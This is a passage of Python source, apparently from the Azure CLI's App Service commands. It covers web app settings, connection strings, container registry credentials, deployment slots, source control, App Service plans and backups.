skip_dns_registration=False if keep_dns_registration else None)
def stop_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'stop', slot)
def start_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'start', slot)
def restart_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restart', slot)
def get_site_configs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_configuration', slot)
def get_app_settings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_app_setting_names = client.web_apps.list_slot_configuration_names(resource_group_name, name).app_setting_names
return _build_app_settings_output(result.properties, slot_app_setting_names)
# Check if the app setting is propagated to the Kudu site correctly by calling api/settings endpoint
# should_have [] is a list of app settings which are expected to be set
# should_not_have [] is a list of app settings which are expected to be absent
# should_contain {} is a dictionary of app settings which are expected to be set with precise values
# Return True if validation succeeded
def validate_app_settings_in_scm(cmd, resource_group_name, name, slot=None,
should_have=None, should_not_have=None, should_contain=None):
scm_settings = _get_app_settings_from_scm(cmd, resource_group_name, name, slot)
scm_setting_keys = set(scm_settings.keys())
if should_have and not set(should_have).issubset(scm_setting_keys):
return False
if should_not_have and set(should_not_have).intersection(scm_setting_keys):
return False
temp_setting = scm_settings.copy()
temp_setting.update(should_contain or {})
if temp_setting != scm_settings:
return False
return True
@retryable_method(3, 5)
def _get_app_settings_from_scm(cmd, resource_group_name, name, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
settings_url = '{}/api/settings'.format(scm_url)
username, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
headers = {
'Content-Type': 'application/octet-stream',
'Cache-Control': 'no-cache',
'User-Agent': get_az_user_agent()
}
import requests
response = requests.get(settings_url, headers=headers, auth=(username, password), timeout=3)
return response.json() or {}
def get_connection_strings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_constr_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.connection_string_names or []
result = [{'name': p,
'value': result.properties[p].value,
'type':result.properties[p].type,
'slotSetting': p in slot_constr_names} for p in result.properties]
return result
def get_azure_storage_accounts(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
slot_azure_storage_config_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.azure_storage_config_names or []
return [{'name': p,
'value': result.properties[p],
'slotSetting': p in slot_azure_storage_config_names} for p in result.properties]
def _fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot=None):
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
url = next(p['publishUrl'] for p in profiles if p['publishMethod'] == 'FTP')
setattr(webapp, 'ftpPublishingUrl', url)
return webapp
def _format_fx_version(custom_image_name, container_config_type=None):
lower_custom_image_name = custom_image_name.lower()
if "https://" in lower_custom_image_name or "http://" in lower_custom_image_name:
custom_image_name = lower_custom_image_name.replace("https://", "").replace("http://", "")
fx_version = custom_image_name.strip()
fx_version_lower = fx_version.lower()
# handles case of only spaces
if fx_version:
if container_config_type:
fx_version = '{}|{}'.format(container_config_type, custom_image_name)
elif not fx_version_lower.startswith('docker|'):
fx_version = '{}|{}'.format('DOCKER', custom_image_name)
else:
fx_version = ' '
return fx_version
def _add_fx_version(cmd, resource_group_name, name, custom_image_name, slot=None):
fx_version = _format_fx_version(custom_image_name)
web_app = get_webapp(cmd, resource_group_name, name, slot)
if not web_app:
raise CLIError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name))
linux_fx = fx_version if web_app.reserved else None
windows_fx = fx_version if web_app.is_xenon else None
return update_site_configs(cmd, resource_group_name, name,
linux_fx_version=linux_fx, windows_fx_version=windows_fx, slot=slot)
def _delete_linux_fx_version(cmd, resource_group_name, name, slot=None):
return update_site_configs(cmd, resource_group_name, name, linux_fx_version=' ', slot=slot)
def _get_fx_version(cmd, resource_group_name, name, slot=None):
site_config = get_site_configs(cmd, resource_group_name, name, slot)
return site_config.linux_fx_version or site_config.windows_fx_version or ''
def url_validator(url):
try:
result = urlparse(url)
return all([result.scheme, result.netloc, result.path])
except ValueError:
return False
def _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot=None):
from base64 import b64decode
linux_fx_version = _get_fx_version(cmd, resource_group_name, name, slot)
if not any([linux_fx_version.startswith(s) for s in MULTI_CONTAINER_TYPES]):
raise CLIError("Cannot decode config that is not one of the"
" following types: {}".format(','.join(MULTI_CONTAINER_TYPES)))
return b64decode(linux_fx_version.split('|')[1].encode('utf-8'))
def _get_linux_multicontainer_encoded_config_from_file(file_name):
from base64 import b64encode
config_file_bytes = None
if url_validator(file_name):
response = urlopen(file_name, context=_ssl_context())
config_file_bytes = response.read()
else:
with open(file_name, 'rb') as f:
config_file_bytes = f.read()
# Decode base64 encoded byte array into string
return b64encode(config_file_bytes).decode('utf-8')
# for any modifications to the non-optional parameters, adjust the reflection logic accordingly
# in the method
# pylint: disable=unused-argument
def update_site_configs(cmd, resource_group_name, name, slot=None, number_of_workers=None, linux_fx_version=None,
windows_fx_version=None, pre_warmed_instance_count=None, php_version=None,
python_version=None, net_framework_version=None,
java_version=None, java_container=None, java_container_version=None,
remote_debugging_enabled=None, web_sockets_enabled=None,
always_on=None, auto_heal_enabled=None,
use32_bit_worker_process=None,
min_tls_version=None,
http20_enabled=None,
app_command_line=None,
ftps_state=None,
generic_configurations=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers', number_of_workers, min_val=0, max_val=20)
if linux_fx_version:
if linux_fx_version.strip().lower().startswith('docker|'):
update_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE=false"])
else:
delete_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE"])
if pre_warmed_instance_count is not None:
pre_warmed_instance_count = validate_range_of_int_flag('--prewarmed-instance-count', pre_warmed_instance_count,
min_val=0, max_val=20)
import inspect
frame = inspect.currentframe()
bool_flags = ['remote_debugging_enabled', 'web_sockets_enabled', 'always_on',
'auto_heal_enabled', 'use32_bit_worker_process', 'http20_enabled']
int_flags = ['pre_warmed_instance_count', 'number_of_workers']
# note: getargvalues is used already in azure.cli.core.commands.
# and no simple functional replacement for this deprecating method for 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[3:]:
if arg in int_flags and values[arg] is not None:
values[arg] = validate_and_convert_to_int(arg, values[arg])
if arg != 'generic_configurations' and values.get(arg, None):
setattr(configs, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
generic_configurations = generic_configurations or []
result = {}
for s in generic_configurations:
try:
result.update(get_json_object(s))
except CLIError:
config_name, value = s.split('=', 1)
result[config_name] = value
for config_name, value in result.items():
setattr(configs, config_name, value)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
def delete_app_settings(cmd, resource_group_name, name, setting_names, slot=None):
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
app_settings.properties.pop(setting_name, None)
if slot_cfg_names.app_setting_names and setting_name in slot_cfg_names.app_setting_names:
slot_cfg_names.app_setting_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings.properties, slot, client)
return _build_app_settings_output(result.properties, slot_cfg_names.app_setting_names)
def delete_azure_storage_accounts(cmd, resource_group_name, name, custom_id, slot=None):
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
azure_storage_accounts.properties.pop(custom_id, None)
if slot_cfg_names.azure_storage_config_names and custom_id in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.remove(custom_id)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
return result.properties
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and sys.platform.system() == 'Windows'):
try:
return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _build_app_settings_output(app_settings, slot_cfg_names):
slot_cfg_names = slot_cfg_names or []
return [{'name': p,
'value': app_settings[p],
'slotSetting': p in slot_cfg_names} for p in _mask_creds_related_appsettings(app_settings)]
def update_connection_strings(cmd, resource_group_name, name, connection_string_type,
settings=None, slot=None, slot_settings=None):
from azure.mgmt.web.models import ConnStringValueTypePair
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
for name_value in settings + slot_settings:
# split at the first '=', connection string should not have '=' in the name
conn_string_name, value = name_value.split('=', 1)
if value[0] in ["'", '"']: # strip away the quots used as separators
value = value[1:-1]
conn_strings.properties[conn_string_name] = ConnStringValueTypePair(value=value,
type=connection_string_type)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings.properties, slot, client)
if slot_settings:
new_slot_setting_names = [n.split('=', 1)[0] for n in slot_settings]
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.connection_string_names = slot_cfg_names.connection_string_names or []
slot_cfg_names.connection_string_names += new_slot_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def delete_connection_strings(cmd, resource_group_name, name, setting_names, slot=None):
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
conn_strings.properties.pop(setting_name, None)
if slot_cfg_names.connection_string_names and setting_name in slot_cfg_names.connection_string_names:
slot_cfg_names.connection_string_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings.properties, slot, client)
CONTAINER_APPSETTING_NAMES = ['DOCKER_REGISTRY_SERVER_URL', 'DOCKER_REGISTRY_SERVER_USERNAME',
'DOCKER_REGISTRY_SERVER_PASSWORD', "WEBSITES_ENABLE_APP_SERVICE_STORAGE"]
APPSETTINGS_TO_MASK = ['DOCKER_REGISTRY_SERVER_PASSWORD']
def update_container_settings(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
websites_enable_app_service_storage=None, docker_registry_server_password=None,
multicontainer_config_type=None, multicontainer_config_file=None, slot=None):
settings = []
if docker_registry_server_url is not None:
settings.append('DOCKER_REGISTRY_SERVER_URL=' + docker_registry_server_url)
if (not docker_registry_server_user and not docker_registry_server_password and
docker_registry_server_url and '.azurecr.io' in docker_registry_server_url):
logger.warning('No credential was provided to access Azure Container Registry. Trying to look up...')
parsed = urlparse(docker_registry_server_url)
registry_name = (parsed.netloc if parsed.scheme else parsed.path).split('.')[0]
try:
docker_registry_server_user, docker_registry_server_password = _get_acr_cred(cmd.cli_ctx, registry_name)
except Exception as ex: # pylint: disable=broad-except
logger.warning("Retrieving credentials failed with an exception:'%s'", ex) # consider throw if needed
if docker_registry_server_user is not None:
settings.append('DOCKER_REGISTRY_SERVER_USERNAME=' + docker_registry_server_user)
if docker_registry_server_password is not None:
settings.append('DOCKER_REGISTRY_SERVER_PASSWORD=' + docker_registry_server_password)
if websites_enable_app_service_storage:
settings.append('WEBSITES_ENABLE_APP_SERVICE_STORAGE=' + websites_enable_app_service_storage)
if docker_registry_server_user or docker_registry_server_password or docker_registry_server_url or websites_enable_app_service_storage: # pylint: disable=line-too-long
update_app_settings(cmd, resource_group_name, name, settings, slot)
settings = get_app_settings(cmd, resource_group_name, name, slot)
if docker_custom_image_name is not None:
_add_fx_version(cmd, resource_group_name, name, docker_custom_image_name, slot)
if multicontainer_config_file and multicontainer_config_type:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
update_site_configs(cmd, resource_group_name, name, linux_fx_version=linux_fx_version, slot=slot)
elif multicontainer_config_file or multicontainer_config_type:
logger.warning('Must change both settings --multicontainer-config-file FILE --multicontainer-config-type TYPE')
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
slot=slot))
def update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
docker_registry_server_password=None, slot=None):
return update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
docker_custom_image_name, docker_registry_server_user, None,
docker_registry_server_password, multicontainer_config_type=None,
multicontainer_config_file=None, slot=slot)
def _get_acr_cred(cli_ctx, registry_name):
from azure.mgmt.containerregistry import ContainerRegistryManagementClient
from azure.cli.core.commands.parameters import get_resources_in_subscription
client = get_mgmt_service_client(cli_ctx, ContainerRegistryManagementClient).registries
result = get_resources_in_subscription(cli_ctx, 'Microsoft.ContainerRegistry/registries')
result = [item for item in result if item.name.lower() == registry_name]
if not result or len(result) > 1:
raise CLIError("No resource or more than one were found with name '{}'.".format(registry_name))
resource_group_name = parse_resource_id(result[0].id)['resource_group']
registry = client.get(resource_group_name, registry_name)
if registry.admin_user_enabled: # pylint: disable=no-member
cred = client.list_credentials(resource_group_name, registry_name)
return cred.username, cred.passwords[0].value
raise CLIError("Failed to retrieve container registry credentials. Please either provide the "
"credentials or run 'az acr update -n {} --admin-enabled true' to enable "
"admin first.".format(registry_name))
def delete_container_settings(cmd, resource_group_name, name, slot=None):
_delete_linux_fx_version(cmd, resource_group_name, name, slot)
delete_app_settings(cmd, resource_group_name, name, CONTAINER_APPSETTING_NAMES, slot)
def show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config, slot))
def show_container_settings_functionapp(cmd, resource_group_name, name, slot=None):
return show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=slot)
def _filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config=None, slot=None):
result = [x for x in settings if x['name'] in CONTAINER_APPSETTING_NAMES]
fx_version = _get_fx_version(cmd, resource_group_name, name, slot).strip()
if fx_version:
added_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME',
'value': fx_version}
result.append(added_image_name)
if show_multicontainer_config:
decoded_value = _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot)
decoded_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME_DECODED',
'value': decoded_value}
result.append(decoded_image_name)
return result
# TODO: remove this when #3660(service tracking issue) is resolved
def _mask_creds_related_appsettings(settings):
for x in [x1 for x1 in settings if x1 in APPSETTINGS_TO_MASK]:
settings[x] = None
return settings
def add_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
HostNameBinding = cmd.get_models('HostNameBinding')
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
binding = HostNameBinding(location=webapp.location, site_name=webapp.name)
if slot is None:
return client.web_apps.create_or_update_host_name_binding(resource_group_name, webapp.name, hostname, binding)
return client.web_apps.create_or_update_host_name_binding_slot(resource_group_name, webapp.name, hostname, binding,
slot)
def delete_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return client.web_apps.delete_host_name_binding(resource_group_name, webapp_name, hostname)
return client.web_apps.delete_host_name_binding_slot(resource_group_name, webapp_name, slot, hostname)
def list_hostnames(cmd, resource_group_name, webapp_name, slot=None):
result = list(_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'list_host_name_bindings', slot))
for r in result:
r.name = r.name.split('/')[-1]
return result
def get_external_ip(cmd, resource_group_name, webapp_name):
SslState = cmd.get_models('SslState')
# logics here are ported from portal
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
if webapp.hosting_environment_profile:
address = client.app_service_environments.list_vips(
resource_group_name, webapp.hosting_environment_profile.name)
if address.internal_ip_address:
ip_address = address.internal_ip_address
else:
vip = next((s for s in webapp.host_name_ssl_states if s.ssl_state == SslState.ip_based_enabled), None)
ip_address = vip.virtual_ip if vip else address.service_ip_address
else:
ip_address = _resolve_hostname_through_dns(webapp.default_host_name)
return {'ip': ip_address}
def _resolve_hostname_through_dns(hostname):
import socket
return socket.gethostbyname(hostname)
def create_webapp_slot(cmd, resource_group_name, webapp, slot, configuration_source=None):
Site, SiteConfig, NameValuePair = cmd.get_models('Site', 'SiteConfig', 'NameValuePair')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, webapp)
site_config = get_site_configs(cmd, resource_group_name, webapp, None)
if not site:
raise CLIError("'{}' app doesn't exist".format(webapp))
if 'functionapp' in site.kind:
raise CLIError("'{}' is a function app. Please use `az functionapp deployment slot create`.".format(webapp))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
slot_def.site_config = SiteConfig()
# if it is a Windows Container site, at least pass the necessary
# app settings to perform the container image validation:
if configuration_source and site_config.windows_fx_version:
# get settings from the source
clone_from_prod = configuration_source.lower() == webapp.lower()
src_slot = None if clone_from_prod else configuration_source
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_application_settings', src_slot)
settings = []
for k, v in app_settings.properties.items():
if k in ("DOCKER_REGISTRY_SERVER_USERNAME", "DOCKER_REGISTRY_SERVER_PASSWORD",
"DOCKER_REGISTRY_SERVER_URL"):
settings.append(NameValuePair(name=k, value=v))
slot_def.site_config = SiteConfig(app_settings=settings)
poller = client.web_apps.create_or_update_slot(resource_group_name, webapp, slot_def, slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source)
result.name = result.name.split('/')[-1]
return result
def create_functionapp_slot(cmd, resource_group_name, name, slot, configuration_source=None):
Site = cmd.get_models('Site')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' function app doesn't exist".format(name))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
poller = client.web_apps.create_or_update_slot(resource_group_name, name, slot_def, slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
update_slot_configuration_from_source(cmd, client, resource_group_name, name, slot, configuration_source)
result.name = result.name.split('/')[-1]
return result
def update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source=None):
clone_from_prod = configuration_source.lower() == webapp.lower()
site_config = get_site_configs(cmd, resource_group_name, webapp,
None if clone_from_prod else configuration_source)
_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_configuration', slot, site_config)
# slot create doesn't clone over the app-settings and connection-strings, so we do it here
# also make sure slot settings don't get propagated.
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, webapp)
src_slot = None if clone_from_prod else configuration_source
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_application_settings',
src_slot)
for a in slot_cfg_names.app_setting_names or []:
app_settings.properties.pop(a, None)
connection_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_connection_strings',
src_slot)
for a in slot_cfg_names.connection_string_names or []:
connection_strings.properties.pop(a, None)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_application_settings',
app_settings.properties, slot, client)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_connection_strings',
connection_strings.properties, slot, client)
def config_source_control(cmd, resource_group_name, name, repo_url, repository_type='git', branch=None, # pylint: disable=too-many-locals
manual_integration=None, git_token=None, slot=None, cd_app_type=None,
app_working_dir=None, nodejs_task_runner=None, python_framework=None,
python_version=None, cd_account_create=None, cd_project_url=None, test=None,
slot_swap=None, private_repo_username=None, private_repo_password=None):
client = web_client_factory(cmd.cli_ctx)
location = _get_location_from_webapp(client, resource_group_name, name)
if cd_project_url:
# Add default values
cd_app_type = 'AspNet' if cd_app_type is None else cd_app_type
python_framework = 'Django' if python_framework is None else python_framework
python_version = 'Python 3.5.3 x86' if python_version is None else python_version
webapp_list = None if test is None else list_webapp(resource_group_name)
vsts_provider = VstsContinuousDeliveryProvider()
cd_app_type_details = {
'cd_app_type': cd_app_type,
'app_working_dir': app_working_dir,
'nodejs_task_runner': nodejs_task_runner,
'python_framework': python_framework,
'python_version': python_version
}
try:
status = vsts_provider.setup_continuous_delivery(cmd.cli_ctx, resource_group_name, name, repo_url,
branch, git_token, slot_swap, cd_app_type_details,
cd_project_url, cd_account_create, location, test,
private_repo_username, private_repo_password, webapp_list)
except RuntimeError as ex:
raise CLIError(ex)
logger.warning(status.status_message)
return status
non_vsts_params = [cd_app_type, app_working_dir, nodejs_task_runner, python_framework,
python_version, cd_account_create, test, slot_swap]
if any(non_vsts_params):
raise CLIError('Following parameters are of no use when cd_project_url is None: ' +
'cd_app_type, app_working_dir, nodejs_task_runner, python_framework,' +
'python_version, cd_account_create, test, slot_swap')
from azure.mgmt.web.models import SiteSourceControl, SourceControl
if git_token:
sc = SourceControl(location=location, source_control_name='GitHub', token=git_token)
client.update_source_control('GitHub', sc)
source_control = SiteSourceControl(location=location, repo_url=repo_url, branch=branch,
is_manual_integration=manual_integration,
is_mercurial=(repository_type != 'git'))
# SCC config can fail if previous commands caused SCMSite shutdown, so retry here.
for i in range(5):
try:
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'create_or_update_source_control',
slot, source_control)
return LongRunningOperation(cmd.cli_ctx)(poller)
except Exception as ex: # pylint: disable=broad-except
import re
ex = ex_handler_factory(no_throw=True)(ex)
# for non server errors(50x), just throw; otherwise retry 4 times
if i == 4 or not re.findall(r'\(50\d\)', str(ex)):
raise
logger.warning('retrying %s/4', i + 1)
time.sleep(5) # retry in a moment
def update_git_token(cmd, git_token=None):
'''
Update source control token cached in Azure app service. If no token is provided,
the command will clean up existing token.
'''
client = web_client_factory(cmd.cli_ctx)
from azure.mgmt.web.models import SourceControl
sc = SourceControl(name='not-really-needed', source_control_name='GitHub', token=git_token or '')
return client.update_source_control('GitHub', sc)
def show_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_source_control', slot)
def delete_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete_source_control', slot)
def enable_local_git(cmd, resource_group_name, name, slot=None):
SiteConfigResource = cmd.get_models('SiteConfigResource')
client = web_client_factory(cmd.cli_ctx)
location = _get_location_from_webapp(client, resource_group_name, name)
site_config = SiteConfigResource(location=location)
site_config.scm_type = 'LocalGit'
if slot is None:
client.web_apps.create_or_update_configuration(resource_group_name, name, site_config)
else:
client.web_apps.create_or_update_configuration_slot(resource_group_name, name,
site_config, slot)
return {'url': _get_local_git_url(cmd.cli_ctx, client, resource_group_name, name, slot)}
def sync_site_repo(cmd, resource_group_name, name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'sync_repository', slot)
except CloudError as ex: # Because of bad spec, sdk throws on 200. We capture it here
if ex.status_code not in [200, 204]:
raise ex
def list_app_service_plans(cmd, resource_group_name=None):
client = web_client_factory(cmd.cli_ctx)
if resource_group_name is None:
plans = list(client.app_service_plans.list(detailed=True)) # enables querying "numberOfSites"
else:
plans = list(client.app_service_plans.list_by_resource_group(resource_group_name))
for plan in plans:
# prune a few useless fields
del plan.geo_region
del plan.subscription
return plans
def create_app_service_plan(cmd, resource_group_name, name, is_linux, hyper_v, per_site_scaling=False,
app_service_environment=None, sku='B1', number_of_workers=None, location=None,
tags=None, no_wait=False):
HostingEnvironmentProfile, SkuDescription, AppServicePlan = cmd.get_models(
'HostingEnvironmentProfile', 'SkuDescription', 'AppServicePlan')
sku = _normalize_sku(sku)
_validate_asp_sku(app_service_environment, sku)
if is_linux and hyper_v:
raise CLIError('usage error: --is-linux | --hyper-v')
client = web_client_factory(cmd.cli_ctx)
if app_service_environment:
if hyper_v:
raise CLIError('Windows containers is not yet supported in app service environment')
ase_list = client.app_service_environments.list()
ase_found = False
ase = None
for ase in ase_list:
if ase.name.lower() == app_service_environment.lower():
ase_def = HostingEnvironmentProfile(id=ase.id)
location = ase.location
ase_found = True
break
if not ase_found:
raise CLIError("App service environment '{}' not found in subscription.".format(ase.id))
else: # Non-ASE
ase_def = None
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
# the api is odd on parameter naming, have to live with it for now
sku_def = SkuDescription(tier=get_sku_name(sku), name=sku, capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), hyper_v=(hyper_v or None), name=name,
per_site_scaling=per_site_scaling, hosting_environment_profile=ase_def)
return sdk_no_wait(no_wait, client.app_service_plans.create_or_update, name=name,
resource_group_name=resource_group_name, app_service_plan=plan_def)
def update_app_service_plan(instance, sku=None, number_of_workers=None):
if number_of_workers is None and sku is None:
logger.warning('No update is done. Specify --sku and/or --number-of-workers.')
sku_def = instance.sku
if sku is not None:
sku = _normalize_sku(sku)
sku_def.tier = get_sku_name(sku)
sku_def.name = sku
if number_of_workers is not None:
sku_def.capacity = number_of_workers
instance.sku = sku_def
return instance
def update_functionapp_app_service_plan(cmd, instance, sku=None, number_of_workers=None, max_burst=None):
instance = update_app_service_plan(instance, sku, number_of_workers)
if max_burst is not None:
if not is_plan_elastic_premium(cmd, instance):
raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
instance.maximum_elastic_worker_count = max_burst
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-instances',
number_of_workers, min_val=0, max_val=20)
return update_app_service_plan(instance, sku, number_of_workers)
def show_backup_configuration(cmd, resource_group_name, webapp_name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except Exception: # pylint: disable=broad-except
raise CLIError('Backup configuration not found')
def list_backups(cmd, resource_group_name, webapp_name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'list_backups',
slot)
def create_backup(cmd, resource_group_name, webapp_name, storage_account_url,
db_name=None, db_type=None,
db_connection_string=None, backup_name=None, slot=None):
BackupRequest = cmd.get_models('BackupRequest')
client = web_client_factory(cmd.cli_ctx)
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
backup_request = BackupRequest(backup_name=backup_name,
storage_account_url=storage_account_url, databases=db_setting)
if slot:
return client.web_apps.backup_slot(resource_group_name, webapp_name, backup_request, slot)
return client.web_apps.backup(resource_group_name, webapp_name, backup_request)
def update_backup_schedule(cmd, resource_group_name, webapp_name, storage_account_url=None,
frequency=None, keep_at_least_one_backup=None,
retention_period_in_days=None, db_name=None,
db_connection_string=None, db_type=None, backup_name=None, slot=None):
BackupSchedule, BackupRequest = cmd.get_models('BackupSchedule', 'BackupRequest')
configuration = None
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
if not backup_name:
backup_name = '{0}_{1}'.format(webapp_name, datetime.datetime.utcnow().strftime('%Y%m%d%H%M'))
try:
configuration = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except DefaultErrorResponseException:
# No configuration set yet
if not all([storage_account_url, frequency, retention_period_in_days,
keep_at_least_one_backup]):
raise CLIError('No backup configuration found. A configuration must be created. ' +
'Usage: --container-url URL --frequency TIME --retention DAYS ' +
'--retain-one TRUE/FALSE')
# If arguments were not specified, use the values in the current backup schedule
if storage_account_url is None:
storage_account_url = configuration.storage_account_url
if retention_period_in_days is None:
retention_period_in_days = configuration.backup_schedule.retention_period_in_days
if keep_at_least_one_backup is None:
keep_at_least_one_backup = configuration.backup_schedule.keep_at_least_one_backup
else:
keep_at_least_one_backup = keep_at_least_one_backup.lower() == 'true'
if frequency:
# Parse schedule frequency
